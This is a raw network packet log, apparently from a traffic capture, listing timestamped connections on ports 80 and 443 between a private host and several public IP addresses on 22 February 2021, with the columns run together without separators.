                                                                                                                                                Feb 22, 2021 23:44:38.387901068 CET443498105.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:38.387918949 CET49810443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:38.387938023 CET443498105.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:38.387965918 CET49810443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:38.387993097 CET443498105.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:38.388015032 CET49810443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:38.388031960 CET443498105.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:38.388051033 CET49810443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:38.392041922 CET49810443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:38.394449949 CET49810443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:38.394998074 CET4980280192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:44:38.396265030 CET4981180192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:44:38.465681076 CET443498105.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:38.468094110 CET49810443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:38.563956022 CET8049811192.0.84.247192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:38.564129114 CET4981180192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:44:38.564733028 CET8049802192.0.84.247192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:38.564830065 CET4981180192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:44:38.564842939 CET4980280192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:44:38.732530117 CET8049811192.0.84.247192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:38.732558966 CET8049811192.0.84.247192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:38.732666016 CET4981180192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:44:38.733304977 CET49803443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:38.779551029 CET44349803216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:38.781856060 CET44349803216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:38.781965971 CET49803443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:38.847085953 CET49812443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:38.888155937 CET44349812216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:38.888423920 CET49812443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:38.891298056 CET49812443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:38.933420897 CET44349812216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:38.941950083 CET44349812216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:38.943177938 CET49812443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:38.943670988 CET49812443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:38.948174953 CET49812443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:38.989466906 CET44349812216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:38.990744114 CET44349812216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:39.131381035 CET44349812216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:39.131411076 CET44349812216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:39.131432056 CET44349812216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:39.131449938 CET44349812216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:39.131546021 CET49812443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:39.361824036 CET4980480192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:39.364875078 CET4981380192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:39.418648005 CET8049804104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:39.418756008 CET4980480192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:39.421211958 CET8049813104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:39.421339035 CET4981380192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:39.438502073 CET4981380192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:39.494868994 CET8049813104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:39.607686996 CET8049813104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:39.607821941 CET4981380192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:39.609096050 CET49805443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:39.652750015 CET49814443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:39.667207956 CET44349805104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:39.667252064 CET44349805104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:39.667315006 CET49805443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:39.667352915 CET49805443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:39.710442066 CET44349814104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:39.710542917 CET49814443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:39.711747885 CET49814443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:39.768043041 CET44349814104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:39.768271923 CET44349814104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:39.768354893 CET49814443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:39.768794060 CET49814443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:39.773050070 CET49814443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:39.824976921 CET44349814104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:39.829649925 CET44349814104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:39.947176933 CET44349814104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:39.947273016 CET49814443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:39.949862003 CET49815443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:40.006282091 CET44349815104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:40.006429911 CET49815443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:40.008529902 CET49815443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:40.066193104 CET44349815104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:40.066540003 CET44349815104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:40.066638947 CET49815443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:40.067321062 CET49815443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:40.071434975 CET49815443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:40.123744965 CET44349815104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:40.127635956 CET44349815104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:40.259891033 CET44349815104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:40.259989023 CET49815443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:40.260040998 CET44349815104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:40.260106087 CET44349815104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:40.260132074 CET49815443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:40.260190964 CET49815443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:40.260248899 CET44349815104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:40.260325909 CET49815443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:40.260384083 CET44349815104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:40.260454893 CET49815443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:40.260468006 CET44349815104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:40.260519028 CET44349815104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:40.260524988 CET49815443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:40.260550976 CET44349815104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:40.260576963 CET49815443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:40.260579109 CET44349815104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:40.260610104 CET49815443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:40.260628939 CET49815443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:40.271074057 CET49815443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:40.271104097 CET49815443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:40.273788929 CET4980780192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:40.276070118 CET4981680192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:40.322058916 CET8049807172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:40.322165012 CET4980780192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:40.322803974 CET8049816172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:40.322916031 CET4981680192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:40.342509031 CET4981680192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:40.389296055 CET8049816172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:40.807472944 CET8049816172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:40.807691097 CET4981680192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:40.810537100 CET49818443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:40.863876104 CET44349818172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:40.864002943 CET49818443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:40.864500046 CET49818443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:40.917628050 CET44349818172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:40.923270941 CET44349818172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:40.923367977 CET49818443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:40.923887968 CET49818443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:40.928504944 CET49818443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:40.978924990 CET44349818172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:40.982717037 CET44349818172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:41.473603964 CET44349818172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:41.473664045 CET44349818172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:41.473707914 CET44349818172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:41.473736048 CET44349818172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:41.473753929 CET49818443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:41.473776102 CET44349818172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:41.473793983 CET49818443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:41.473818064 CET44349818172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:41.473846912 CET49818443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:41.473856926 CET44349818172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:41.473859072 CET49818443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:41.473900080 CET44349818172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:41.473933935 CET49818443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:41.473938942 CET44349818172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:41.473953962 CET49818443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:41.474045992 CET49818443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:41.474323034 CET49818443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:41.474378109 CET49818443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:41.513062000 CET44349818172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:41.513103008 CET44349818172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:41.513258934 CET44349818172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:41.513298035 CET44349818172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:41.513336897 CET49818443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:41.513370991 CET49818443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:41.513377905 CET49818443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:41.513392925 CET49818443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:41.513955116 CET44349818172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:41.513999939 CET44349818172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:41.514020920 CET49818443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:41.514086008 CET49818443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:41.515289068 CET44349818172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:41.515347958 CET44349818172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:41.515741110 CET49818443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:41.516462088 CET44349818172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:41.516515970 CET44349818172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:41.516550064 CET49818443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:41.516655922 CET49818443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:41.517704964 CET44349818172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:41.517760992 CET44349818172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:41.517777920 CET49818443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:41.517817974 CET49818443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:41.518971920 CET44349818172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:41.519022942 CET49818443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:41.519046068 CET44349818172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:41.519103050 CET49818443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:41.520207882 CET44349818172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:41.520268917 CET44349818172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:41.520294905 CET49818443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:41.520332098 CET49818443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:41.521441936 CET44349818172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:41.521496058 CET44349818172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:41.521512985 CET49818443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:41.521562099 CET49818443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:41.522679090 CET44349818172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:41.522735119 CET44349818172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:41.522753954 CET49818443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:41.522792101 CET49818443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:41.523929119 CET44349818172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:41.524043083 CET44349818172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:41.524271965 CET49818443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:41.527153015 CET44349818172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:41.527209044 CET44349818172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:41.527270079 CET49818443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:41.527389050 CET49818443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:41.527720928 CET44349818172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:41.527777910 CET44349818172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:41.527861118 CET49818443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:41.528994083 CET44349818172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:41.529042959 CET44349818172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:41.529061079 CET49818443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:41.529098034 CET49818443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:41.581156015 CET4980980192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:41.582092047 CET4982180192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:41.652335882 CET80498215.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:41.653434992 CET4982180192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:41.653996944 CET80498095.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:41.654105902 CET4982180192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:41.654195070 CET4980980192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:41.724905968 CET80498215.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:41.725047112 CET80498215.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:41.725227118 CET4982180192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:41.730423927 CET49823443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:41.798783064 CET443498235.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:41.799084902 CET49823443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:41.800151110 CET49823443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:41.868649006 CET443498235.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:41.868760109 CET443498235.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:41.868935108 CET49823443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:41.869580984 CET49823443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:41.875314951 CET49823443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:41.943619013 CET443498235.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:42.312655926 CET443498235.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:42.312714100 CET443498235.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:42.312767982 CET443498235.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:42.312825918 CET443498235.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:42.312880993 CET443498235.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:42.312885046 CET49823443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:42.312947035 CET443498235.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:42.312966108 CET49823443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:42.312983036 CET443498235.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:42.313060045 CET49823443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:42.313113928 CET49823443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:42.314174891 CET49823443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:42.318572998 CET4981180192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:44:42.320878029 CET4982580192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:44:42.382507086 CET443498235.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:42.382657051 CET49823443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:42.487948895 CET8049811192.0.84.247192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:42.488050938 CET4981180192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:44:42.491456032 CET8049825192.0.84.247192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:42.491579056 CET4982580192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:44:42.492003918 CET4982580192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:44:42.663961887 CET8049825192.0.84.247192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:42.663991928 CET8049825192.0.84.247192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:42.664089918 CET4982580192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:44:42.665988922 CET49812443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:42.713529110 CET44349812216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:42.715543032 CET44349812216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:42.715658903 CET49812443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:42.738797903 CET49827443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:42.780896902 CET44349827216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:42.781052113 CET49827443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:42.783185959 CET49827443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:42.825263023 CET44349827216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:42.835246086 CET44349827216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:42.835345984 CET49827443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:42.835371017 CET44349827216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:42.835417986 CET44349827216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:42.835448027 CET49827443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:42.835515022 CET49827443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:42.842545033 CET49827443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:42.888562918 CET44349827216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:42.889883041 CET44349827216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:42.890006065 CET49827443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:42.891382933 CET49827443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:42.937659979 CET44349827216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:43.076982975 CET44349827216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:43.077034950 CET44349827216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:43.077097893 CET44349827216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:43.077126980 CET49827443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:43.077156067 CET44349827216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:43.077188015 CET49827443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:43.077264071 CET49827443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:43.284738064 CET4981380192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:43.286597967 CET4982880192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:43.343067884 CET8049813104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:43.343211889 CET4981380192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:43.344744921 CET8049828104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:43.344970942 CET4982880192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:43.355197906 CET4982880192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:43.411633015 CET8049828104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:43.527904987 CET8049828104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:43.528028965 CET4982880192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:43.534037113 CET49814443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:43.590383053 CET44349814104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:43.590408087 CET44349814104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:43.590471029 CET49814443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:43.590501070 CET49814443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:43.597313881 CET49830443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:43.653821945 CET44349830104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:43.653945923 CET49830443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:43.654468060 CET49830443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:43.712462902 CET44349830104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:43.712697029 CET44349830104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:43.712799072 CET49830443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:43.713357925 CET49830443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:43.720824003 CET49830443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:43.770869017 CET44349830104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:43.777228117 CET44349830104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:43.885466099 CET44349830104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:43.885554075 CET49830443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:43.894321918 CET49831443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:43.953283072 CET44349831104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:43.953377008 CET49831443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:43.954741955 CET49831443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:44.010900021 CET44349831104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:44.010972977 CET44349831104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:44.011147022 CET49831443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:44.011692047 CET49831443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:44.018457890 CET49831443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:44.067733049 CET44349831104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:44.074609041 CET44349831104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:44.202440023 CET44349831104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:44.202477932 CET44349831104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:44.202501059 CET44349831104.244.42.70192.168.2.6
